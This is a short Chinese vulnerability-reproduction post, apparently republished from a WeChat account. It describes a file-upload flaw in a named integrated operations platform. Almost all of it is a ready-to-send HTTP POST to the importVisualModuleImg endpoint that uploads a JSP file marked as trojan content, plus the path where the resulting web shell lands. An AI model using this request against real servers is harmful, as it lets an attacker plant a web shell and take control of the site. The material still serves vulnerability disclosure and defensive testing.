bp发包
链接地址:地址/files/visual/img/2/1.jsp
POST /manage/tplresource/importVisualModuleImg?moduleId=2 HTTP/1.1 Host: 地址 Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Type: multipart/form-data; boundary=----9979a3f1-cdb1-43af-af88-a9b48b67cf71 Content-Length: 196 Cookie: JSESSIONID=9438c497-92ad-4800-b821-20602adec4ac; rememberMe=dcOzuzCzFrtr02GhN9IwcsR9v759kvzO9wq/upEQ0jwsU5y/25kFW52CaKmZoRP7pwH979ifBBXB3b+li3PSXwZmxnh+bMgi6kv5vv8WNkNdy1pblj7sPxtwIm71auJPyyOl+aMKAhk/71leMQLpneRk/8f6USYL/acFuWhpjyuVU6oP6YJdIoCKGgdxAiUk; ------9979a3f1-cdb1-43af-af88-a9b48b67cf71 Content-Disposition: form-data; name="file"; filename="1.jsp" Content-Type: multipart/form-data 木马内容 ------9979a3f1-cdb1-43af-af88-a9b48b67cf71--
原文始发于微信公众号(我吃饼干):【漏洞复现】北京中科聚网一体化运营平台存在importVisualModuleImg文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论